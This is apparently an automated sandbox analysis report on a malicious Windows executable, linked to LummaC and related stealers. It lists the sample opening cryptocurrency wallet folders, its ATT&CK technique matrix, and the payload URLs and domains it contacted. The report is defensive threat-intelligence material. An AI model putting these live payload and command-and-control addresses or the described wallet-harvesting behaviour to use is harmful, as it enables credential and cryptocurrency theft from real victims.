        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: Yara matchFile source: Process Memory Space: file.exe PID: 7280, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Process Memory Space: file.exe PID: 7280, type: MEMORYSTR
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
        Windows Management Instrumentation
        1
        DLL Side-Loading
        11
        Process Injection
        34
        Virtualization/Sandbox Evasion
        2
        OS Credential Dumping
        1
        Query Registry
        Remote Services41
        Data from Local System
        1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading
        11
        Process Injection
        LSASS Memory75
        Security Software Discovery
        Remote Desktop ProtocolData from Removable Media11
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
        Obfuscated Files or Information
        Security Account Manager34
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
        Software Packing
        NTDS1
        Process Discovery
        Distributed Component Object ModelInput Capture114
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets1
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials223
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        file.exe100%AviraTR/Crypt.TPM.Gen
        file.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://185.215.113.16/off/def.exe~0%Avira URL Cloudsafe
        https://property-imper.sbs/&0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        property-imper.sbs
        172.67.162.84
        truefalse
          high
          www.google.com
          142.250.181.100
          truefalse
            high
            s-part-0035.t-0009.t-msedge.net
            13.107.246.63
            truefalse
              high
              js.monitor.azure.com
              unknown
              unknownfalse
                high
                mdec.nelreports.net
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://property-imper.sbs/apifalse
                    high
                    https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_103.6.drfalse
                        high
                        https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_103.6.drfalse
                              high
                              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.file.exe, 00000000.00000003.1867096614.0000000005385000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1867046636.0000000005384000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://www.linkedin.com/cws/share?url=$chromecache_95.6.dr, chromecache_86.6.drfalse
                                  high
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17file.exe, 00000000.00000003.1839835019.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1839554728.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1815246096.00000000053C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1839395842.00000000053B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/Youssef1313chromecache_103.6.drfalse
                                        high
                                        https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_95.6.dr, chromecache_86.6.drfalse
                                          high
                                          https://aka.ms/msignite_docs_bannerchromecache_95.6.dr, chromecache_86.6.drfalse
                                            high
                                            https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_86.6.drfalse
                                              high
                                              http://polymer.github.io/AUTHORS.txtchromecache_95.6.dr, chromecache_86.6.drfalse
                                                high
                                                https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_103.6.drfalse
                                                  high
                                                  https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_95.6.dr, chromecache_86.6.drfalse
                                                    high
                                                    https://property-imper.sbs/&file.exe, 00000000.00000003.2066625567.00000000007D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://185.215.113.16/off/def.exe~file.exe, 00000000.00000003.2066625567.00000000007D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_103.6.drfalse
                                                      high
                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.1867046636.0000000005384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://x1.c.lencr.org/0file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://x1.i.lencr.org/0file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://aka.ms/pshelpmechoosechromecache_95.6.dr, chromecache_86.6.drfalse
                                                              high
                                                              https://aka.ms/feedback/report?space=61chromecache_103.6.drfalse
                                                                high
                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installfile.exe, 00000000.00000003.1815317910.0000000005394000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://learn-video.azurefd.net/vod/playerchromecache_95.6.dr, chromecache_86.6.drfalse
                                                                      high
                                                                      https://twitter.com/intent/tweet?original_referer=$chromecache_95.6.dr, chromecache_86.6.drfalse
                                                                        high
                                                                        https://github.com/gewarrenchromecache_103.6.drfalse
                                                                          high
                                                                          https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1866501722.000000000547F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://polymer.github.io/CONTRIBUTORS.txtchromecache_95.6.dr, chromecache_86.6.drfalse
                                                                              high
                                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94file.exe, 00000000.00000003.1867096614.0000000005385000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1867046636.0000000005384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_103.6.drfalse
                                                                                  high
                                                                                  https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_103.6.drfalse
                                                                                    high
                                                                                    https://client-api.arkoselabs.com/v2/api.jschromecache_95.6.dr, chromecache_86.6.drfalse
                                                                                      high
                                                                                      https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_95.6.dr, chromecache_86.6.drfalse
                                                                                        high
                                                                                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgfile.exe, 00000000.00000003.1867096614.0000000005385000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1867046636.0000000005384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_95.6.dr, chromecache_86.6.drfalse
                                                                                            high
                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://github.com/Thrakachromecache_103.6.drfalse
                                                                                                high
                                                                                                http://polymer.github.io/PATENTS.txtchromecache_95.6.dr, chromecache_86.6.drfalse
                                                                                                  high
                                                                                                  https://aka.ms/certhelpchromecache_95.6.dr, chromecache_86.6.drfalse
                                                                                                    high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctafile.exe, 00000000.00000003.1867096614.0000000005385000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1867046636.0000000005384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://github.com/mairawchromecache_103.6.drfalse
                                                                                                            high
                                                                                                            http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016file.exe, 00000000.00000003.1839835019.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1839554728.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1815246096.00000000053C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1839395842.00000000053B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://schema.orgchromecache_86.6.drfalse
                                                                                                                  high
                                                                                                                  http://polymer.github.io/LICENSE.txtchromecache_95.6.dr, chromecache_86.6.drfalse
                                                                                                                    high
                                                                                                                    https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://property-imper.sbs/file.exe, file.exe, 00000000.00000003.2066625567.00000000007D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1866501722.000000000547F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://aka.ms/yourcaliforniaprivacychoiceschromecache_103.6.drfalse
                                                                                                                            high
                                                                                                                            https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/nschonnichromecache_103.6.drfalse
                                                                                                                                high
                                                                                                                                http://185.215.113.16/file.exe, 00000000.00000003.2066572141.00000000007F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_95.6.dr, chromecache_86.6.drfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/adegeochromecache_103.6.drfalse
                                                                                                                                      high
                                                                                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.1867096614.0000000005385000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1867046636.0000000005384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://support.microsoffile.exe, 00000000.00000003.1815246096.00000000053C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://github.com/jonschlinkert/is-plain-objectchromecache_95.6.dr, chromecache_86.6.drfalse
                                                                                                                                            high
                                                                                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://octokit.github.io/rest.js/#throttlingchromecache_95.6.dr, chromecache_86.6.drfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/js-cookie/js-cookiechromecache_95.6.dr, chromecache_86.6.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://185.215.113.16/off/def.exefile.exefalse
                                                                                                                                                    high
                                                                                                                                                    http://schema.org/Organizationchromecache_103.6.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesfile.exe, 00000000.00000003.1815317910.0000000005394000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://channel9.msdn.com/chromecache_95.6.dr, chromecache_86.6.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://github.com/dotnet/trychromecache_95.6.dr, chromecache_86.6.drfalse
                                                                                                                                                              high
                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              13.107.246.63
                                                                                                                                                              s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                              185.215.113.16
                                                                                                                                                              unknownPortugal
                                                                                                                                                              206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                              142.250.181.100
                                                                                                                                                              www.google.comUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              172.67.162.84
                                                                                                                                                              property-imper.sbsUnited States
                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                              239.255.255.250
                                                                                                                                                              unknownReserved
                                                                                                                                                              unknownunknownfalse
                                                                                                                                                              IP
                                                                                                                                                              192.168.2.4
                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                              Analysis ID:1561483
                                                                                                                                                              Start date and time:2024-11-23 14:45:08 +01:00
                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 6m 29s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                              Number of analysed new started processes analysed:10
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Sample name:file.exe
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@24/58@7/6
                                                                                                                                                              EGA Information:Failed
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 93.184.221.240, 192.229.221.95, 172.217.21.35, 23.218.210.69, 172.217.17.46, 74.125.205.84, 2.20.41.214, 34.104.35.123, 142.250.181.138, 172.217.19.170, 172.217.19.234, 172.217.17.42, 172.217.17.74, 172.217.19.202, 142.250.181.10, 142.250.181.106, 142.250.181.74, 23.32.239.82, 23.32.239.25, 172.217.17.67
                                                                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, clients.l.google.com, wcpstatic.microsoft.com
                                                                                                                                                              • Execution Graph export aborted for target file.exe, PID 7280 because there are no executed function
                                                                                                                                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                              • VT rate limit hit for: file.exe
                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              08:46:11API Interceptor72x Sleep call for process: file.exe modified
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              13.107.246.63file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  185.215.113.16file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 185.215.113.16/off/random.exe
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 185.215.113.16/off/def.exe
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16/off/def.exe
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 185.215.113.16/luma/random.exe
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16/off/def.exe
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16/off/def.exe
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 185.215.113.16/mine/random.exe
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16/off/def.exe
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 185.215.113.16/mine/random.exe
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16/off/def.exe
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  s-part-0035.t-0009.t-msedge.net21Installer.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  n5QCsKJ0CP.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  1732341065aa3050236bf0a757080986a42d53699fd38d78c31f65f12b4934c9236ce70a12688.dat-decoded.exeGet hashmaliciousXenoRATBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  17323410673807b67d8bb6f66f1d676167634fbe15d4743d1d486ea52ce68855c1615ccc44621.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  property-imper.sbsAura.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  yakuza.sh.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 40.97.215.138
                                                                                                                                                                                  yakuza.i586.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 22.54.216.176
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 23.101.168.44
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 13.89.179.8
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 20.96.153.111
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  CLOUDFLARENETUSxLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.155.47
                                                                                                                                                                                  Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.198.61
                                                                                                                                                                                  Aura.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.88.250
                                                                                                                                                                                  injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.44.93
                                                                                                                                                                                  injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
